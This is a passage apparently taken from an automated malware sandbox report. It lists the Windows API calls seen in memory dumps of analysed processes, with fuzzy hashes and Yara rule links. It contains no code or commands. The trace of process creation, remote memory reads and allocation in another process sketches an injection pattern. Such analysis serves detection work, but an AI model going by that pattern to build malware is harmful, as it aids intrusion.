                                                        Uniqueness Score: -1.00%

                                                        Function 020305E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02030640
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 4a7c0a42ab46a9f9ba8c3a3a31c7a862c6032f9d02062061a4d8c40ddac57bb4
                                                        • Instruction ID: 210639ea6d820f306cc096f0bd1e79a2ed974b3de5e8fe06b8e3f5c00ee6daec
                                                        • Opcode Fuzzy Hash: 4a7c0a42ab46a9f9ba8c3a3a31c7a862c6032f9d02062061a4d8c40ddac57bb4
                                                        • Instruction Fuzzy Hash: B31102755093C09FDB128B25DC94B52FFB4EF43220F0880DBEC858B263D265A908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0049AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 0b9c345f0dccdab55868bfa102c0a18b65fe1e3686b725c8a75807e0819d86a4
                                                        • Instruction ID: 6bff17dd8d0cf91b836edf13080211cee7ec008636d6775eb03dbd3e19f63242
                                                        • Opcode Fuzzy Hash: 0b9c345f0dccdab55868bfa102c0a18b65fe1e3686b725c8a75807e0819d86a4
                                                        • Instruction Fuzzy Hash: B8113CB56006009FEB20DF25DC85B56FF98EB15621F08847ADD49CB741D674E814CAA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 0049AA71
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 1efdd4637e2348c88b76a9dfcc9ee1a6687d93ec9dfa961382144c92a178f644
                                                        • Instruction ID: 770d8cb4f35cc728916fd0b2418a3e57865743f43e499dc202cde6789865fc2f
                                                        • Opcode Fuzzy Hash: 1efdd4637e2348c88b76a9dfcc9ee1a6687d93ec9dfa961382144c92a178f644
                                                        • Instruction Fuzzy Hash: 5411C1754097C09FDB128B21DC85A92BFA0EF13320F0980DBDD858F263D268A909C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0203092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0203099C
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 168b00b24056199d271f1cefee8353a5906b0698e2dbbdd8f8b71d77ef6542f1
                                                        • Instruction ID: b6db52f325620026b516713a29a2c5b9a3bfe067d51c0cd9bddf72e687b0e94b
                                                        • Opcode Fuzzy Hash: 168b00b24056199d271f1cefee8353a5906b0698e2dbbdd8f8b71d77ef6542f1
                                                        • Instruction Fuzzy Hash: B6119D755097C09FE723CB25DC55B92BFA4EF07324F0980DBDD844B263C265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020307C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 02030819
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 3cb7e7181602e722da743497076613090c608cd914cc6fcae94746b867ecbd0e
                                                        • Instruction ID: 85acd17944745779268e9cacc9fd8fabc1197a022a5ad7bcc9434b5c30fc6dc2
                                                        • Opcode Fuzzy Hash: 3cb7e7181602e722da743497076613090c608cd914cc6fcae94746b867ecbd0e
                                                        • Instruction Fuzzy Hash: 3801CC71501704EFFB219F11DC85BAAFB9CEF04720F1484AAED489B681D674A904CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020313AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 214dd8dd2e0f94bf39e4c6cff60123c1b25432ff0fc520a958d8729007cc0298
                                                        • Instruction ID: 6ad64e8cdb1c2d4cf623ac188b20495a9607475d3286fe964177732a7b1cbf89
                                                        • Opcode Fuzzy Hash: 214dd8dd2e0f94bf39e4c6cff60123c1b25432ff0fc520a958d8729007cc0298
                                                        • Instruction Fuzzy Hash: 62118E76500700DFEB22CF55DC85B66FBE8EF08220F0888AAED498B651D371E414DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 0049ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 8805a21ee502c0ec1b395aa20f6358da39cad30e002ed179dc7069e5b144fa17
                                                        • Instruction ID: 724ae887b592e8c55f61594527b565b9a15734b43a549913dec426d845556f27
                                                        • Opcode Fuzzy Hash: 8805a21ee502c0ec1b395aa20f6358da39cad30e002ed179dc7069e5b144fa17
                                                        • Instruction Fuzzy Hash: AC11CEB55097809FDB11CF65DC85B82BFA4EF12320F0980ABDD488F253D274A908CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0049BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: f7b23b98b35370a0b9bd03fb1a98dc0868f9b826ec3cecdd0b46c868f17adb10
                                                        • Instruction ID: 2d77601fa854ad4ee737d2a614eb05ddbf53198ed6c46853a0fcd1903b44dfe2
                                                        • Opcode Fuzzy Hash: f7b23b98b35370a0b9bd03fb1a98dc0868f9b826ec3cecdd0b46c868f17adb10
                                                        • Instruction Fuzzy Hash: 2F117C72500704DFDF20CF95D984B52FFE4EF18720F0889AADD898A612D375E414DBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0049A23E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 77694d5a69d24573851bb64fcbe8dc10d39e0d7fb009b4088bdf024a62e06020
                                                        • Instruction ID: 7f502c4325663efd4969e8465afc1423242fb5036e5c3349ce068f571ad58107
                                                        • Opcode Fuzzy Hash: 77694d5a69d24573851bb64fcbe8dc10d39e0d7fb009b4088bdf024a62e06020
                                                        • Instruction Fuzzy Hash: D4018471900600AFE310DF26DD86B66FBB8FB88A20F14856AED089B741D335F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02030196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 020301D0
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: bbaa9de38a09ab8d90518ce93c475b4e5b8dea615588211a2d16a315cc132177
                                                        • Instruction ID: 5c57a244df80db3b6f8ba9ebd47c5c4a4215eaf39094601e992e351ad524f311
                                                        • Opcode Fuzzy Hash: bbaa9de38a09ab8d90518ce93c475b4e5b8dea615588211a2d16a315cc132177
                                                        • Instruction Fuzzy Hash: FB019E71601704CFEB51DF66DC85766FBD8EB01220F0884AADC09CB642D774E404DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0203104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0203109E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 62b871f7d87cb100744be279de5faa21d8b377bbbe826bef4c2a71a316ee1f71
                                                        • Instruction ID: 29c35046ae9056d771dcc51e83b6ddc0bcaa327880cdac3cd16f8922ae097b48
                                                        • Opcode Fuzzy Hash: 62b871f7d87cb100744be279de5faa21d8b377bbbe826bef4c2a71a316ee1f71
                                                        • Instruction Fuzzy Hash: D4017171900600AFE310DF26DD86B66FBA8FB88A20F14856AED089B741D335B515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: e81955c6c0bb53d1a564190251a6b394e4be9658b3df60e576cd0461b66fb106
                                                        • Instruction ID: a72a2f40dd0aa3a3b395f23091f37a6492391ef4811a128526861556519cf626
                                                        • Opcode Fuzzy Hash: e81955c6c0bb53d1a564190251a6b394e4be9658b3df60e576cd0461b66fb106
                                                        • Instruction Fuzzy Hash: 78019A75900200DBEB208F15ED857A6FFA4EB05620F0884ABDD498B696D379A804CBA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020312FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0203132F
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 2814ba72165dae632e4635e9fde10e4ab41d3eb98d0f52d17ffab3a9c3ddb0c0
                                                        • Instruction ID: e6c934c80b82eec2e1674840b2ce241bc29ac0ca37d07d1df7ef995755983e33
                                                        • Opcode Fuzzy Hash: 2814ba72165dae632e4635e9fde10e4ab41d3eb98d0f52d17ffab3a9c3ddb0c0
                                                        • Instruction Fuzzy Hash: 9501BC75500300DFEF218F15D8C57AAFBE8EF09620F08C8AADC098B652D675A404DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A8FA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 0049A94A
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        • String ID:
                                                        • API String ID: 2060303382-0
                                                        • Opcode ID: fcfb7c5504754847c71c192d06025990840921cc7d88e5f94b209b9967e37964
                                                        • Instruction ID: 18c0ff7307618dace42b1e7ed2924e8322c6e37eb7f97241a85fc220cfc097cb
                                                        • Opcode Fuzzy Hash: fcfb7c5504754847c71c192d06025990840921cc7d88e5f94b209b9967e37964
                                                        • Instruction Fuzzy Hash: 3C016271900600ABD320DF16DD86B26FBB4FB89B20F14825AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020304B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02030502
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 63ee00d72541be27d41f7b70fa939d6d0d4f3dcf9ab5eac7eaf4942b9b9be5d6
                                                        • Instruction ID: fc3329f76e1a333aa5635715a5ddfce2801554c1be6f644c2c03e4fdcc2d5545
                                                        • Opcode Fuzzy Hash: 63ee00d72541be27d41f7b70fa939d6d0d4f3dcf9ab5eac7eaf4942b9b9be5d6
                                                        • Instruction Fuzzy Hash: 9D016271900600ABD320DF16DD86B26FBB4FB89B20F14825AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02030F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02030FB0
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 48421e9dcc6e0b2a839acb87d7cdbbe4d16800c1dbc2ad76fbfeed842098f744
                                                        • Instruction ID: 8f1476ea932d2424f562ea20c29b813b5a1dfa3460b2fff900cfb9fbf14fecec
                                                        • Opcode Fuzzy Hash: 48421e9dcc6e0b2a839acb87d7cdbbe4d16800c1dbc2ad76fbfeed842098f744
                                                        • Instruction Fuzzy Hash: C3017C71501744DFEB61DF15D885B66FBD8EB00620F0884AADC49CF656D374E504DAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0203060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02030640
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 2fb6f00eac01d36c00909d522593bfa638191563a729dd39a5ed02fc6693c277
                                                        • Instruction ID: b8df666c9f5c724c7a8568191185b2c6644efe335fde76466fd233550647d9ae
                                                        • Opcode Fuzzy Hash: 2fb6f00eac01d36c00909d522593bfa638191563a729dd39a5ed02fc6693c277
                                                        • Instruction Fuzzy Hash: AE01F435601700CFEB218F15DC85766FBA8EF45620F08C0AADC498B756D375E404DAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 0049ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 8bf3021529019a2718b1cb32b2a16af50941b76a6d43f579bc76f247b1a09c23
                                                        • Instruction ID: e89a0c2101d241c759bc5d0a461359a395212a8b67806926ce659433b2dfd570
                                                        • Opcode Fuzzy Hash: 8bf3021529019a2718b1cb32b2a16af50941b76a6d43f579bc76f247b1a09c23
                                                        • Instruction Fuzzy Hash: A701A931504640CFEB10DF59D889BA2FFA4EB00220F18C4ABCE098F202D278A804CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02031116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02031148
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 8b435452a04b4bf76db27175ce2d869010e43b1b3e9037d2b75a800d36439c37
                                                        • Instruction ID: 076b1c52262cf3bd38b60a531fc38b85f95a2de8ce4372f95ce2ecf442ecca65
                                                        • Opcode Fuzzy Hash: 8b435452a04b4bf76db27175ce2d869010e43b1b3e9037d2b75a800d36439c37
                                                        • Instruction Fuzzy Hash: 07F0FF35500740DFEB22CF05D8857A6FBA8EF09A21F08C09ACC484B312C675A444DAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 6fdee5f3fa30b8dc4107f1bb2dde021def1164a620017294a88978dea184c0a0
                                                        • Instruction ID: 1d93e0637e6f6fda4877c3bdab03f982f17ebb39bbae79129ec34240101536bc
                                                        • Opcode Fuzzy Hash: 6fdee5f3fa30b8dc4107f1bb2dde021def1164a620017294a88978dea184c0a0
                                                        • Instruction Fuzzy Hash: 26F08735904740DFEB209F06D889766FFA0EB05721F18C0AADD494B712D379A918DAA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0203096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0203099C
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 2d5361fcc9f104b40780eed23d946fd5b3513413448b69dbd089856fbcf152ec
                                                        • Instruction ID: c53e1d776ea88e652ef0ef7dc2d890e5a77d7afbba97b03bd3611c67d26d78bb
                                                        • Opcode Fuzzy Hash: 2d5361fcc9f104b40780eed23d946fd5b3513413448b69dbd089856fbcf152ec
                                                        • Instruction Fuzzy Hash: 1FF0F934901700CFEB21CF06D888726FBA4EF04320F08C09BCC480B312C374A408DAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 0049AA71
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 7f346dee46ee6ad091f8b2162cc091b3c8eba8570e2953c425bc7463d4d5c8af
                                                        • Instruction ID: df818922a395e30eecc4527d307c4a860c242654c0afc044aac909f88f980b68
                                                        • Opcode Fuzzy Hash: 7f346dee46ee6ad091f8b2162cc091b3c8eba8570e2953c425bc7463d4d5c8af
                                                        • Instruction Fuzzy Hash: 47F0A935500B40CFEB20CF15D989762FFA0EB45721F18C0AADD094B352D278A914CAA7
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 0049A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: dd8b750576258477b6df103d72177390fcb15dbcafac549d854cbc2cb243d05b
                                                        • Instruction ID: 8322fbdd03702ebe8f981db0541f707beb1a62dd76f0f8adcc91ea496b6119a2
                                                        • Opcode Fuzzy Hash: dd8b750576258477b6df103d72177390fcb15dbcafac549d854cbc2cb243d05b
                                                        • Instruction Fuzzy Hash: D111A3755093809FDB11CF25DC85B93FFA4EF06220F0984EBED858F262D275A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 0049A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 8dc6017f31cb074f791c803ba9b10b4156b108dbd66a738f607aa5fe1a0f8d1d
                                                        • Instruction ID: 6bef438cef827c396e3a766a22ad3b3cfa761fa18caf08337165e282914b2ff4
                                                        • Opcode Fuzzy Hash: 8dc6017f31cb074f791c803ba9b10b4156b108dbd66a738f607aa5fe1a0f8d1d
                                                        • Instruction Fuzzy Hash: 9601DF75600640CFEB10DF15D8897A6FFA4EF05320F18C4BBDC098B342D279A814CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004923F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162727701.0000000000492000.00000040.00000001.sdmp, Offset: 00492000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b39c4508bf821dcb05122933e63cffec95b91a67fda6c23771e52d2fd7378777
                                                        • Instruction ID: 5f6bfb6623c1f3d716b46687a052b90891ab367aaa8f5d9364b5ad8febbdf0c1
                                                        • Opcode Fuzzy Hash: b39c4508bf821dcb05122933e63cffec95b91a67fda6c23771e52d2fd7378777
                                                        • Instruction Fuzzy Hash: 54D05E79204A919FDB168A1CC2A4F963B94AF65B04F4644FAE840CB7A3C7A8E981D200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004923BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162727701.0000000000492000.00000040.00000001.sdmp, Offset: 00492000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6c200612c04dd003dbe06757db4375825cb9fe68edc4831e207f959d4042783f
                                                        • Instruction ID: 1347d5741a8d2d08e130f35d0dba8f3e6d0554ad33ff3db3fd94fd96eea2b8ba
                                                        • Opcode Fuzzy Hash: 6c200612c04dd003dbe06757db4375825cb9fe68edc4831e207f959d4042783f
                                                        • Instruction Fuzzy Hash: 71D05E343006818FDB25CA2CC294F5A77E4AF40700F0644F9BC008B366C3ACE880C604
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: svchost.exe PID: 2232 Parent PID: 1388 svchost.exeCOMMON

                                                        Executed Functions

                                                        Function 00501888, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KiUserExceptionDispatcher.NTDLL ref: 005018A8
                                                        • KiUserExceptionDispatcher.NTDLL ref: 005018BA
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000002.2199349764.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                        Similarity
                                                        • API ID: DispatcherExceptionUser
                                                        • String ID:
                                                        • API String ID: 6842923-0
                                                        • Opcode ID: 7b213770fedc1457c8141463648917ea8d463f700b5c364c13bfa5246b3c097a
                                                        • Instruction ID: 6768ae4208e382afe8011e61adcc4f61e8e183a0d0f061df2ed6b340f39dfb4d
                                                        • Opcode Fuzzy Hash: 7b213770fedc1457c8141463648917ea8d463f700b5c364c13bfa5246b3c097a
                                                        • Instruction Fuzzy Hash: 41E01A70E00208DFC754FFA8E88551A7BF8BB48300B1045A9C809D7384EB706A01CFB6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00504B58, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00504D8E
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000002.2199349764.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 98cac9d84fd64eed7341fc4180e61179a5d4ede651875b8bb98913ec1b1fa791
                                                        • Instruction ID: eab3dab2f13367fc04316790a0373422c6f43101ed3aeef7b2602d4557ada859
                                                        • Opcode Fuzzy Hash: 98cac9d84fd64eed7341fc4180e61179a5d4ede651875b8bb98913ec1b1fa791
                                                        • Instruction Fuzzy Hash: 0C9159B1D01619CFEB10CFA9C8417EEBBB6BF48314F148569D909A7280DB749D85CF92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 005045B9, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00504640
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000002.2199349764.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 525722b37905b1e6383321e5c94f670133b7d0511da7d594d6a88f1b14b699dc
                                                        • Instruction ID: 6726d6c018c9c7cc7b4fa03ff67985a186649f6dca6dce04412aead393a8f20b
                                                        • Opcode Fuzzy Hash: 525722b37905b1e6383321e5c94f670133b7d0511da7d594d6a88f1b14b699dc
                                                        • Instruction Fuzzy Hash: 772127759002599FCB10CFA9D884BEEFBB5FF48314F10882EE959A7240D7789941CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 005045C0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00504640
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000002.2199349764.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 7d4700536eda9c28d7985895a42855d0c1afb2d1d76f052cfc3af9bd7f8abe30
                                                        • Instruction ID: 126469519192acfb6054bbbadf9553f49d74faa51167a0463d9953b372781ed9
                                                        • Opcode Fuzzy Hash: 7d4700536eda9c28d7985895a42855d0c1afb2d1d76f052cfc3af9bd7f8abe30
                                                        • Instruction Fuzzy Hash: A0213C75D002099FCB10CF99C8447EEFBF5FF48314F50882AE919A7240D7759540CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00504010, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0050407E
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000002.2199349764.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
